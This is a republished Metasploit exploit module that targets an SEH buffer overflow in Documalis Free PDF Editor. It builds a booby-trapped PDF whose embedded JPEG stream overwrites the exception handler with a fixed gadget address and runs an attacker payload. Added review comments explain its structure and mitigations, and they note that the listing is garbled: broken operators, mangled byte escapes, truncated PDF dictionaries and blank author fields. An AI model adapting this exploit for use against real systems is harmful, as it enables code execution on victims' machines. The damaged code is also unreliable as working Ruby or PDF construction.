
Published on June 22nd, 2020 📆 | 2749 Views ⚑


Documalis Free PDF Editor Buffer Overflow ≈ Packet Storm



##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Metasploit file-format exploit module for Documalis Free PDF Editor.
# It produces a PDF whose /DCTDecode image stream carries an SEH overwrite;
# the file is consumed by the victim application, so despite the
# Msf::Exploit::Remote base class there is no network component here.
#
# NOTE(review): this listing is damaged by the page rendering — the `<<`
# operators are split ("< <"), the byte-escape sequences in the string
# literals are mangled, and the PDF dictionary bodies appear truncated to
# "< >". As shown it does not parse; the comments below describe intent
# only as far as the visible code supports it.
class MetasploitModule < Msf::Exploit::Remote
# Module reliability rank (Metasploit metadata).
Rank = NormalRanking

include Msf::Exploit::FILEFORMAT # file_create and the FILENAME option
include Msf::Exploit::PDF # presumably supplies @pdf, header, eol, add_object, finish_pdf used in make_pdf
include Msf::Exploit::Seh # generate_seh_record

# Module metadata. The single target is PDFEditor.exe with a fixed return
# address (a pop/pop/ret gadget, per the inline comment) and a 433-byte
# offset to the SEH record. Reliance on a fixed in-image address is exactly
# what ASLR / SafeSEH on that binary would defeat, which is the relevant
# mitigation for this class of bug.
def initialize(info = {})
super(update_info(info,
'Name' => 'Documalis Free PDF Editor',
'Description' => %q{Documalis Free PDF Editor is prone to a security vulnerability when open PDF files.When the application is used to open a specially crafted PDF file, a buffer overflow occurs allowing arbitrary code execution.
},
'License' => MSF_LICENSE,
'Author' =>
[
'metacom', # Vulnerability discovery and PoC
'', # Metasploit module
# NOTE(review): the module-author entry above is blank in this copy.
],
'References' =>
[
['EDB', ]
# NOTE(review): the EDB id is missing from this copy; left blank rather than guessed.
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process', # none/process/thread/seh
},
'Platform' => 'win',
'Payload' =>
{
# Space is capped at 2000 bytes; #jpeg pads payload + filler to 2388 bytes,
# so this cap is what keeps that subtraction non-negative.
'Space' => 2000,
'DisableNops' => true
},
'Targets' =>
[
['',
{
'Ret' => 0x0040160D, # pop eax # pop ebx # ret - PDFEditor.exe
'Offset' => 433
}
]
],
'Privileged' => false,
'DisclosureDate' => 'May 22 2020',
'DefaultTarget' => 0
))

# FILENAME: name of the generated PDF (default msf.pdf).
register_options(
[
OptString.new('FILENAME', [ false, 'The file name.', 'msf.pdf']),
])
end





# Entry point: build the PDF and write it out via the FILEFORMAT mixin.
def exploit
file_create(make_pdf)
end

# Builds the bytes of the /DCTDecode image stream.
#
# The fixed prefix is a JPEG header — going by the markers in the hex:
# SOI (FF D8), an Adobe APP14 segment (FF EE, "Adobe"), a DQT (FF DB),
# a SOF0 (FF C0) declaring 8-bit, 50 x 230, 4 components (consistent with
# /Height, /Width and /DeviceCMYK in make_pdf), and the start of a DHT
# (FF C4). After that come target['Offset'] bytes of junk, the SEH record,
# the encoded payload, and random filler so that payload + filler is
# always 2388 bytes.
#
# Because every variable part has a fixed size, the total length is
# constant for a given target (assuming generate_seh_record yields a
# fixed-size record); make_pdf relies on that when it calls this twice.
#
# Detection note: the result is structurally incomplete as a JPEG (a
# declared table segment followed by kilobytes of non-image data), which
# is a usable signal for PDF/image scanners.
def jpeg
buffer = "xFFxD8xFFxEEx00x0Ex41x64x6Fx62x65x00x64x80x00x00"
buffer < < "x00x02xFFxDBx00x84x00x02x02x02x02x02x02x02x02x02"
buffer < < "x02x03x02x02x02x03x04x03x03x03x03x04x05x04x04x04"
buffer < < "x04x04x05x05x05x05x05x05x05x05x05x05x07x08x08x08"
buffer < < "x07x05x09x0Ax0Ax0Ax0Ax09x0Cx0Cx0Cx0Cx0Cx0Cx0Cx0C"
buffer < < "x0Cx0Cx0Cx0Cx0Cx0Cx0Cx01x03x02x02x03x03x03x07x05"
buffer < < "x05x07x0Dx0Ax09x0Ax0Dx0Fx0Dx0Dx0Dx0Dx0Fx0Fx0Cx0C"
buffer < < "x0Cx0Cx0Cx0Fx0Fx0Cx0Cx0Cx0Cx0Cx0Cx0Fx0Cx0Ex0Ex0E"
buffer < < "x0Ex0Ex0Cx11x11x11x11x11x11x11x11x11x11x11x11x11"
buffer < < "x11x11x11x11x11x11x11x11xFFxC0x00x14x08x00x32x00"
buffer < < "xE6x04x01x11x00x02x11x01x03x11x01x04x11x00xFFxC4"
buffer < < "x01xA2x00x00x00x07x01x01x01x01x01x00x00x00x00x00"
buffer < < "x00x00x00x04x05x03x02x06x01x00x07x08x09x0Ax0Bx01"
buffer < < "x54x02x02x03x01x01x01x01x01x00x00x00x00x00x00x00"
buffer < < "x01x00x02x03x04x05x06x07"
buffer < < rand_text(target['Offset']) # junk
buffer < < generate_seh_record(target.ret)
buffer < < payload.encoded
# Filler to a fixed 2388 bytes; negative only if the payload exceeded
# 2388 bytes, which the 'Space' => 2000 cap prevents.
buffer < < rand_text(2388 - payload.encoded.length)
buffer
end

# Assembles the PDF and returns it via finish_pdf.
#
# Objects 1-5 form the document skeleton (object 3 is the page — it carries
# the /MediaBox — and object 4 looks like a /ProcSet array; the other
# dictionary bodies are truncated to "< >" in this copy). Object 6 is a
# content stream that draws the image /I0; object 7 is the image XObject
# whose /DCTDecode stream is the buffer from #jpeg.
#
# /Length is computed from one call to jpeg and the stream body taken
# from a second; the random parts differ between the two calls but the
# total size does not, so the declared length stays correct.
def make_pdf
@pdf < < header
add_object(1, "< >")
add_object(2, "< >")
add_object(3, "< >>>/MediaBox[0 0 612.0 792.0]>>")
add_object(4, "[/PDF/Text/ImageC]")
add_object(5, "< >")
stream_1 = "stream" < < eol
stream_1 < < "0.000 0.000 0.000 rg 0.000 0.000 0.000 RG q 265.000 0 0 229.000 41.000 522.000 cm /I0 Do Q" << eol
stream_1 < < "endstream" << eol
add_object(6, "< >#{stream_1}")
stream = "< <" << eol
stream < < "/Width 230" << eol
stream < < "/BitsPerComponent 8" << eol
stream < < "/Name /X" << eol
stream < < "/Height 50" << eol
stream < < "/Intent /RelativeColorimetric" << eol
stream < < "/Subtype /Image" << eol
stream < < "/Filter /DCTDecode" << eol
# First jpeg call: only its length is used.
stream < < "/Length #{jpeg.length}" << eol
stream < < "/ColorSpace /DeviceCMYK" << eol
stream < < "/Type /XObject" << eol
stream < < ">>"
stream < < "stream" << eol
# Second jpeg call: this is the body actually embedded.
stream < < jpeg << eol
stream < < "endstream" << eol
add_object(7, stream)
finish_pdf
end
end




